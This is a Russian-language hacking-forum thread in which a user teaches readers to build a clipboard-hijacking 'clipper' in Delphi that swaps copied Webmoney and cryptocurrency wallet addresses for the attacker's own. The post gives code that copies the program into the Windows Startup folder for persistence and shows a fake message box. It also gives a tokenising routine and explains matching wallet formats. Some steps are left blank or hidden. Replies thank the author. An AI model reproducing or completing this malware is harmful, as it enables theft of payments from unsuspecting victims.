Создаем свой клиппер с автозагрузкой,fake message. Это легко - сможет каждый!

Morphin1

Резидент
Статус
offline
Регистрация
06.04.2018
Сообщения
171
Репутация
126
Вообще от себя хочу сказать , что создать клиппер ну оочень просто.Для этого не надо знать много в ЯП. В связи с этим на форумах очень много расплодилось "тру-кодиров" :Boast которые так и стараются продать вам свой клиппер. Сразу хочу сказать , что все эти три...клиперы работают одинаково , и не стоит верить заголовкам "САМЫЙ лучший трипер только у меня".

Ну , вводная часть закончилась , давайте перейдем к практике. Я покажу самый простой способ создать клиппер.

Немного теории и действий :
  1. Дропаемся в автозагрузку , стучим в ipploger и т.д
  2. Мониторим буфер обмена (Ctrl+C)
  3. Находим совпадение -> подменяем часть текста на нужный нам кошелек.

А как программка поймет , что в буфере именно кошелек который нам нужен , и что подменять надо именно на соответствующий кошелек.
Ответ : каждый кошелек по своему уникален. Например кошельки Webmoney имеют первый символ букву (R,Z и т.д) и дальше 12 цифр. Общая сумма символом Webmoney кошелька - 13 символов (при этом 12 из них цифры , следующие сразу за буквой). Bitcoin кошелек рассказывать не буду , просто прочитайте это из этого скрина
Просмотр скрытого контента доступен для зарегистрированных пользователей!
Точно так-же делается и с другими кошельками - Qiwi , Litecoin , Dogi и т.д. Про правила генерации крипто кошельков можно свободно почитать в гугле. Каждый кошелек создается по своему правилу , и чем больше таких правил вы нагуглите , тем больше у вас будет подмены кошельков. Таким образом программка , мониторя буфер видит сопдание по правилу WEBMONEY кошелька , и такая , АГА , хоба - меняет этот кусок текста на наш вебмани. И так с др кошельками аналогично :Don T Mention

Ну давайте напримере Webmoney кошелька и буду показывать.
Кодить будем наш трипер на Delphi (не умные люди уже могут кричать , что весь софт написанный не на С++ - гавно :Dwarf)

Ну поехали.

Для уменьшения веса можно юзать Delphi 7
1. Создаем проект с формой (не люблю консольные приложухи :Diablo) и сразу переходим в Project->Views Sourse
Видем код :

Код:
Application.Initialize;
  Application.CreateForm(TForm1, Form1);
  Application.Run;

После второй строчки вставляем строчку :

После {$R *.res} пишем функцию :

2. Возвращаемся обратно в Unit1> в Uses добавляем ClipBrd,tlhelp32, ShlObj
В общние переменные добавляем :
Код:
na,webmoney,e:string;
pl, ts:TstringList;
Настроили , отлично. Логика нашей программы следующая : каждую 0.5 секунды будем получать содержимое буфера -> каждую строчку рабивать на слова -> если слово подходит под правило кошелька webmoney то заменять , если нет , то ничего.

Автозапуск (самый примитивный , просто дропнемся в папку Автозагрузка , можно юзать и планировщик) . На свойстве OnFormCreate ( или два клика по форме) вставляем код :

Код:
na:=ParamStr(0);
try
CopyFile(PChar(na), Pchar('C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup'), false); // копируем

except

end;
MessageBox(0, 'Текст сообщения' , 'Заголовок' , mb_Yes); // фейк сообщение


3.
Код:
function Find(S:string): TStringList;
var i:integer;
    S2:string;
//    i2:integer;
begin

Result := TStringList.Create;
  For i:=1 to Length(S) do
  begin
   if ( (s[i]<>'  ') and (s[i]<>' ') and (s[i]<>'   ') )  then S2:=s2+s[i]
    else

      if s2<>'' then
      begin
     Result.Add(S2);
    S2:='';

      end;

  end;
 if s2<>'' then Result.Add(S2);


end;

4.

6. Кидаем на форму таймер , ставим интервал 500 (0.5 сек) , кидаем на форму Memo и в свойствах ScrollBar ставим sBoth. Два клика по таймеру и вставляем код :

Главная мысль этой темы показать , что создавать подобные триперы - легче простого , надо только знать правила создания кошельков да и все.
Добавление в авторан через планировщик , iplogger и т.д - посредственная техническая часть.

Кому что непонятно - пишите в коменты , посмотрим что тут у нас. :Pooh On Ball
 

zabilParol

Новичок
Статус
offline
Регистрация
16.03.2018
Сообщения
6
Репутация
0

Morphin1

Резидент
Статус
offline
Регистрация
06.04.2018
Сообщения
171
Репутация
126

SkillUP

Участник
Статус
offline
Регистрация
13.03.2018
Сообщения
38
Репутация
22
Ты сам его написал?
 

Morphin1

Резидент
Статус
offline
Регистрация
06.04.2018
Сообщения
171
Репутация
126

Morphin1

Резидент
Статус
offline
Регистрация
06.04.2018
Сообщения
171
Репутация
126
Походу клипперы стали невостребованы ))
 

krey

Новичок
Статус
offline
Регистрация
08.09.2017
Сообщения
6
Репутация
0
Спасибо за гайд очень полезно!:Clapping